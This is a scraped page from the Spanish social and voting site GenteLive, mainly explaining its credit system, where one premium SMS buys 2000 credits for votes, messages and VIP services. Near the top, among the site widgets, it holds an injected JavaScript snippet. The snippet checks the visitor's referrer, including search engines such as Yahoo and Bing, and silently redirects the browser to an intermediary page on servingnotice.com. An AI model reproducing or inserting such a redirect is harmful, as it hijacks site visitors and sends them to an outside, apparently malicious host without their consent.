Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.443
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Las mejores inocentadas para el 28 de diciembre
 

Error

Para comprar créditos debes estar registrado como usuario.
Si ya estás registrado, por favor, identifícate.

Sistema de créditos

MUY IMPORTANTE Que la web sea gestionada con un novedoso sistema de créditos no implica que registrarse o participar en la web conlleve un coste de dinero. ¡En la web se gastan créditos, no dinero! Lo que se consume en las diferentes secciones de la web son simbólicos créditos de GenteLive, que regalamos a menudo entre nuestros usuarios, sobre todo a los más participativos en sus diferentes apartados.

Cada usuario al registrarse obtiene un elevadísimo número de créditos gratuitamente, que le llevará meses gastarse en la web. De todos modos, hay usuarios que desean votar a alguien con muchos créditos (puntos) de golpe, o escribir muchísimos mensajes, mails o SMS a las chicas y chicos registrados, o activar servicios VIP de la página... y no les llegan los créditos que regalamos, esos usuarios pueden comprar más créditos. ¿Cómo? Enviando un simple SMS de 1,2€. Con ese simple mensaje, la cuenta volverá a estar llena de créditos a rebosar: ¡Porque te damos 2000! Lee las ventajas de este sistema de tener todos los servicios unificados en créditos GenteLive en la última tabla.

¿Qué puedes hacer con los créditos?

5 créditos Escribir y comentar en todas las secciones de la web.
10 créditos Escribir mensajes en las fichas de los usuarios
15 créditos Escribir mensajes privados a los registrados.
200 créditos Enviar un mensaje directamente al mail de la persona que has conocido en la ficha. Lo recibirá como si tu mismo lo hubieses enviado, con tu dirección de mail de remitente. Para que te conteste directamente a ti.
2000 créditos Activar cada uno de los servicios VIP de la web.
4000 créditos Enviar un SMS directamente al móvil de la persona de la ficha.
X créditos Votar con X puntos a la persona que tú quieras, para hacerla subir en el ranking.
1 SMS = 2000 créditos Como habrás calculado, con un simple SMS podrás participar y comentar 400 veces en las diferentes secciones de la web, o enviar 130 mensajes privados a usuarios de la web, o escribir 200 mensajes en las distintas fichas de los usuarios, o enviar 10 mails a su buzón de correo directamente, o activar un servicio VIP de la web, o votar a quien quieras con la puntuación que desees.

Ventajas respecto a la antigua GenteIRC.com

LO MEJOR Antes, para votar a alguien tenías que enviar un SMS con un código, para activar un servicio VIP enviar otro SMS con otro código, para dejar un mensaje en una ficha otro diferente, para votar a un tattoo otro más, y así continuamente... Ahora, con el novedoso sistema de créditos GenteLive se unifica todo ese proceso. ¡Todo es más sencillo! La gente de la web tiene créditos que puede consumir a su gusto en las diferentes secciones de la web, en muchas de ellas el gasto de créditos es simbólico y ridículo, pero necesario para ver la evolución del usuario y lo participativo que es.
VOTOS Antes, con un SMS votabas a una persona con 1000 puntos en GenteIRC.com, ahora... con ese mismo SMS podrás votarla con 2000 puntos ¡el doble! Ya que, en GenteLive.com, un SMS equivale a 2000 créditos, que puedes utilizar para votar a quien quieras (y para muchas otras cosas). El gasto para ti es un 50% menor.
MENSAJES Antes, con un SMS publicabas un mensaje en las fichas de los usuarios de GenteIRC.com, ahora con ese mismo SMS podrás escribir 200 mensajes en sus fichas. Ya que, en GenteLive.com un SMS equivale a 2000 créditos, que puedes utilizar para escribir mensajes (y para muchas otras cosas). El gasto para ti es un 99% menor.
SERVICIOS VIP Antes, con un SMS activabas un servicio VIP en tu ficha de GenteIRC.com, ahora podrás hacer lo mismo. Ya que, en GenteLive.com un SMS equivale a 2000 créditos, con los que puedes activar cualquier servicio VIP. ¿Ventajas? Que hay servicios muy demandados que antes costaban un SMS y ahora regalamos gratuitamente.
COMENTAR Antes, no existía sistema de créditos en GenteIRC.com, por lo cual, determinadas personas se dedicaban a molestar al resto de usuarios de la web escribiendo cientos de comentarios basura, repitiendo hasta la saciedad el mismo comentario con copy-paste, enviando mensajes en blanco para distorsionar la web, plagiando a usuarios sin descanso, insultando a la gente repetidamente, y muchas otras historias que todos conocéis. Ahora, con el nuevo sistema de créditos evitamos todas esas situaciones. El gasto de crétidos por participar en la web es simbólico, prácticamente el coste es cero, cualquier usuario puede participar libremente en todas las secciones de la web con los créditos que se regalan, sin coste alguno, si por casualidad se le terminasen, un simple SMS le facilita 2000 créditos más, que se hacen INAGOTABLES. Ese coste simbólico de 5 créditos evita que la gente utilice programas automáticos y popy-pastes sin sentido para escribir basura sin cesar. ¿Ventajas? Una web más limpia para el disfrute de todos vosotros.
SUPER USUARIOS ¿Qué sucede con los usuarios HIPERACTIVOS de la web? ¿Aquellos que escriben miles de comentarios en las diferentes secciones de la página sin gastar sus créditos en las votaciones? ¿Pueden verse en los primeros puestos del ranking de comentaristas, verdad? Pues sucede... que nuestro equipo los conoce perfectamente y le regalará créditos para que, como hasta ahora, disfruten de su web de siempre.
RESUMEN: Para todos aquellos que participaban en GenteIRC.com y disfrutaban con la web de sus momentos más divertidos, románticos, de ayuda mutua y de consejos, ahora disponen de GenteLive.com, una web más limpia y dinámica. Y todos aquellos que utilizaban GenteIRC.com para votar a sus amigos y amigas y/o dejar comentarios en sus fichas, ahora les costará entre un 50% y un 99% menos.
 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda